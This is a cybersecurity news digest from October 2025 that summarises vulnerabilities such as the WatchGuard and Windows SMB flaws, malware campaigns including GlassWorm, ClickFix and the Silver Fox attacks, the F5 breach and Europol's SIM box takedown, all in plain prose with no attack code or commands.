Daily Brief

Nearly 76,000 WatchGuard Firebox appliances are vulnerable to CVE-2025-9242, a critical remote code execution flaw, with the majority located in Europe and North America. The vulnerability, rated 9.3 in severity, involves an out-of-bounds write in the Fireware OS 'iked' process, affecting IKEv2 VPN negotiations. Exploitation can occur without authentication by sending crafted IKEv2 packets, potentially compromising network security by writing data to unintended memory areas. WatchGuard has recommended upgrading to supported software versions, as version 11.x has reached end of support and will not receive further updates. Temporary workarounds involve securing connections using IPSec and IKEv2 protocols for specific VPN setups, as detailed in vendor documentation. The Shadowserver Foundation's scans confirm the vulnerability's prevalence, with 75,955 devices still at risk as of October 19, 2025. No active exploitation has been reported yet, but administrators are urged to apply patches promptly to mitigate potential threats.

CISA reports active exploitation of a high-severity privilege escalation flaw, CVE-2025-33073, affecting Windows Server and Windows 10 and 11 systems. The vulnerability, patched in June 2025, arises from improper access control, allowing attackers to gain SYSTEM privileges. Attackers can exploit this flaw by coercing a victim's machine to connect to a malicious SMB server, leading to privilege escalation. Microsoft credited several security researchers from CrowdStrike, Synacktiv, SySS GmbH, Google Project Zero, and RedTeam Pentesting GmbH for discovering the flaw. CISA added the vulnerability to its Known Exploited Vulnerabilities Catalog, mandating federal agencies to patch by November 10 under BOD 22-01. While federal agencies are the primary target, CISA urges all organizations to patch this vulnerability promptly to mitigate risks. The advisory warns that such vulnerabilities are common attack vectors for cyber actors, posing significant threats to federal and private sectors alike.

A new malware, GlassWorm, has infiltrated the OpenVSX and Microsoft Visual Studio marketplaces, affecting approximately 35,800 installations by targeting developer extensions. GlassWorm utilizes invisible Unicode characters to conceal its malicious code, making detection challenging for developers using these platforms. The malware spreads by exploiting stolen account credentials, allowing it to infect additional extensions accessible to the compromised user. Command-and-control operations leverage the Solana blockchain, complicating takedown efforts, with Google Calendar serving as a backup communication method. GlassWorm's final payload, ZOMBI, transforms infected systems into nodes for criminal activities, with SOCKS proxy and HVNC components enabling remote access and traffic routing. Microsoft has removed the malicious extension from its marketplace, while some compromised extensions remain available on OpenVSX, posing ongoing risks. The attack mirrors previous incidents like the Shai-Hulud worm, indicating a growing trend in sophisticated supply chain attacks targeting developer ecosystems. Organizations are advised to review and secure their development environments, ensuring robust detection and response capabilities to mitigate such threats.

Microsoft's October 2025 security updates have led to smart card authentication and certificate issues across all Windows 10, Windows 11, and Windows Server versions. The issue arises from a change in Windows Cryptographic Services, transitioning from CSP to KSP for RSA-based smart card certificates to enhance security. Users may experience errors such as "invalid provider type specified" and "CryptAcquireCertificatePrivateKey error" due to this update. The problem is linked to a fix for CVE-2024-30098, which addresses a security feature bypass vulnerability by isolating cryptographic operations. Affected users can temporarily resolve the issue by modifying the DisableCapiOverrideForRSA registry key, though this workaround will be removed by April 2026. Microsoft advises users to collaborate with application vendors to address the underlying issue before the registry key's removal. The update also resolved issues with IIS websites and HTTP/2 localhost connections, and lifted compatibility holds for Windows 11 24H2 upgrades.

Huntress Labs has developed an open-source tool, Cazadora, to detect malicious OAuth applications within Microsoft 365 environments, addressing a significant security risk for enterprises. The tool targets Enterprise Applications and Application Registrations, identifying apps with suspicious characteristics such as anomalous names and reply URLs. Huntress' Security Operations Center (SOC) has mitigated thousands of identity attacks monthly, leveraging new capabilities to combat credential and token theft. Research indicates that approximately 10% of surveyed tenants had Traitorware apps, which are legitimate applications frequently exploited by cybercriminals. Stealthware apps, custom-built for malicious purposes, were found in over 500 instances across Huntress partner tenants, highlighting the need for vigilant app monitoring. The Cazadora script aids Azure administrators in auditing their tenant apps, providing a proactive measure against potential security breaches. Organizations are encouraged to utilize the Huntress Identity Security Assessment for a comprehensive evaluation of their Microsoft 365 identity threat landscape.

F5 disclosed a breach involving unauthorized access to its systems, resulting in the theft of BIG-IP source code and undisclosed vulnerabilities, attributed to the China-linked group UNC5221. The breach was discovered on August 9, 2025, but attackers reportedly maintained access for over a year, exploiting the BRICKSTORM malware family. Elevated scanning activity targeting BIG-IP was observed in September and October 2025, although not directly linked to the breach. Over 680,000 F5 BIG-IP devices are publicly accessible, with the majority located in the U.S., necessitating proactive inventory and patch management. The incident underscores the strategic targeting of edge infrastructure by state-linked actors, emphasizing the need for robust security and intelligence collaboration. Organizations are advised to implement Zero Trust architectures and leverage AI to enhance threat detection and response capabilities. This breach serves as a reminder of the critical importance of securing edge devices and maintaining vigilance against long-term infiltration attempts.

ClickFix attacks prompt users to execute malicious scripts via browser interactions, exploiting user unawareness and bypassing traditional email-based phishing detection methods. These attacks have been linked to significant data breaches at organizations like Kettering Health and Texas Tech University Health Sciences Centers. Attackers employ SEO poisoning and malvertising to lure users, using legitimate-looking sites to trick them into copying and running harmful code. Technical defenses struggle as ClickFix attacks evade detection by camouflaging domains and using obfuscation techniques, bypassing email and web-crawling security tools. Endpoint Detection and Response (EDR) systems are the primary defense but face challenges due to user-initiated actions and sophisticated evasion tactics. Push Security has introduced a browser-based detection tool designed to block malicious copy-paste actions, offering a proactive defense against ClickFix attacks. Organizations are advised to enhance user training and consider adopting browser-based security solutions to mitigate the risks associated with these evolving threats.

Cybersecurity researchers identified 131 Chrome extensions used to hijack WhatsApp Web for spam, affecting approximately 20,905 active users, primarily in Brazil. These extensions, sharing a common codebase, automate message sending to bypass WhatsApp's anti-spam measures, posing significant risks to platform integrity. The extensions are marketed under various names and logos, often masquerading as CRM tools, despite violating Google's Chrome Web Store Spam and Abuse policy. DBX Tecnologia, the company behind these extensions, promotes a reseller program allowing affiliates to rebrand and distribute the software, promising substantial recurring revenue. The campaign has been ongoing for at least nine months, with recent updates indicating sustained activity and adaptation to platform defenses. Security firms Trend Micro, Sophos, and Kaspersky have also reported related campaigns targeting Brazilian users with a WhatsApp worm distributing a banking trojan. The situation underscores the need for enhanced monitoring of browser extension ecosystems to prevent similar abuses and protect users from deceptive practices.

The UK government has initiated a digital version of the Veteran Card, aimed at simplifying access to services and discounts for Armed Forces veterans. Originally scheduled for a summer release, the digital card's launch is delayed, with no specific reasons provided by the Department for Science, Innovation and Technology (DSIT). The digital card will be integrated into the GOV.UK One Login app, which is designed to securely store digital credentials and facilitate public service access. The initiative is part of a broader government strategy to modernize public services, making them more accessible and user-friendly through digital transformation. The digital Veteran Card is distinct from the broader digital ID scheme but utilizes the same secure technology platform, ensuring high security standards. The government is considering expanding digital IDs for voter identification, reflecting a push towards digital solutions in democratic processes. As more credentials are added to the GOV.UK Wallet, the government aims to enhance its functionality and reach a wider user base.

China's Ministry of State Security (MSS) accused the U.S. NSA of a cyber attack on the National Time Service Center (NTSC), claiming the operation was premeditated and aimed at destabilizing Beijing Time. The MSS reported that the NSA used 42 cyber tools in a multi-stage attack, exploiting security flaws in a foreign SMS service to compromise NTSC staff mobile devices. The attack, which began in March 2022, involved the theft of sensitive data and attempts to disrupt NTSC's high-precision timing systems, posing risks to critical infrastructure. The MSS stated that the U.S. used virtual private servers across multiple regions to conceal the origins of the attack, employing tactics like digital certificate forgery and encryption to evade detection. China's national security agencies reportedly neutralized the attack and enhanced security measures to protect the integrity of Beijing Time and associated systems. The MSS accused the U.S. of ongoing cyber operations against China and other regions, using technological footholds in Asia to obscure its involvement. The incident adds tension to U.S.-China relations, with allegations of cyber espionage and counterclaims of misinformation and public manipulation.

Cybercriminals are leveraging TikTok to distribute infostealers by disguising videos as activation guides for software like Windows, Spotify, and Netflix. The campaign, identified by ISC Handler Xavier Mertens, uses social engineering tactics to execute malicious PowerShell commands on users' systems. Users are tricked into running commands that connect to remote sites, downloading malware such as Aura Stealer, which harvests credentials and sensitive data. Aura Stealer targets saved browser credentials, authentication cookies, and cryptocurrency wallets, posing significant risks of account compromise. An additional payload, source.exe, is downloaded and executed in memory, though its exact purpose remains unknown. Victims are advised to reset all passwords immediately, as their credentials are likely compromised. ClickFix attacks have surged in popularity, often linked to ransomware and cryptocurrency theft campaigns. Users should avoid executing commands from untrusted sources to mitigate the risk of such malware infections.

Europol's Operation SIMCARTEL disrupted a cybercrime-as-a-service platform, arresting seven suspects and seizing 1,200 SIM box devices with 40,000 active SIM cards. The operation involved authorities from Austria, Estonia, Finland, and Latvia, in collaboration with Europol and Eurojust, targeting a network facilitating global cybercrime. The dismantled network enabled the creation of over 49 million fake online accounts, used for phishing, financial fraud, and other cybercrimes, impacting victims worldwide. Authorities seized €431,000 in bank accounts and €266,000 in cryptocurrency, along with four luxury vehicles, highlighting the financial scale of the operation. The network's infrastructure was sophisticated, providing temporary phone numbers from over 80 countries for anonymous criminal activities, including social media fraud and identity concealment. The platform's services extended to extortion, migrant smuggling, and distribution of child sexual abuse material, showcasing its broad criminal application. The takedown of websites gogetsms[.]com and apisim[.]com disrupted the network's online presence, marking a significant blow to its operations. This operation underscores the importance of international cooperation in combating complex cybercrime networks that exploit telecommunications infrastructure for illicit gains.

A new campaign is exploiting macOS developers by distributing infostealing malware through fake Homebrew, LogMeIn, and TradingView platforms. The attack utilizes Google Ads to promote malicious sites that mimic legitimate platforms, tricking users into executing harmful commands. Researchers identified over 85 domains impersonating these platforms, leveraging "ClickFix" techniques to deceive users into installing malware. The malware, including AMOS and Odyssey Stealers, is delivered via base64-encoded commands that bypass macOS security features like Gatekeeper. Once installed, the malware collects hardware information, manipulates system services, and exfiltrates sensitive data, including browser credentials and cryptocurrency information. AMOS operates as a malware-as-a-service, offering remote access capabilities, while Odyssey targets browser data and cryptocurrency wallets. Users are advised against executing Terminal commands from untrusted sources to prevent infection and data theft.

Seqrite Labs has identified a new .NET malware, CAPI Backdoor, targeting Russian automobile and e-commerce firms through phishing emails containing ZIP archives. The attack utilizes a decoy Russian-language document and a Windows shortcut (LNK) file to execute the malware via a legitimate Microsoft binary, leveraging a living-off-the-land technique. CAPI Backdoor is capable of stealing data from web browsers, taking screenshots, collecting system information, and exfiltrating data to a remote server. The malware employs methods to establish persistence, including scheduled tasks and LNK files in the Windows Startup folder, ensuring continued access to compromised systems. The campaign's connection to the Russian automobile sector is suggested by a domain impersonating "carprice[.]ru," indicating targeted industry focus. The malware's ability to evade detection by checking for virtual environments and installed antivirus products poses a significant challenge to security measures. Organizations in the targeted sectors are advised to enhance email security protocols and monitor for suspicious activity linked to the identified malware indicators.

Silver Fox, a Chinese cybercrime group, has broadened its Winos 4.0 malware attacks to include Japan and Malaysia, utilizing the HoldingHands RAT for remote access. The group employs phishing emails with malicious PDFs masquerading as official documents to initiate infections, targeting unsuspecting users in these regions. Winos 4.0 spreads through phishing and SEO poisoning, directing victims to fake websites imitating popular software platforms like Google Chrome and Telegram. Recent campaigns have shifted focus to Malaysia, using deceptive landing pages to distribute the HoldingHands RAT, which conducts anti-VM checks and terminates security processes. The HoldingHands RAT communicates with a remote server, executes attacker commands, and can update its command-and-control address via the Windows Registry. Operation Silk Lure, a related campaign, targets Chinese fintech and trading firms with phishing emails containing malicious LNK files, leading to Winos 4.0 deployment. The malware's capabilities include persistence, reconnaissance, and evasion techniques, posing significant risks of espionage, identity theft, and credential compromise.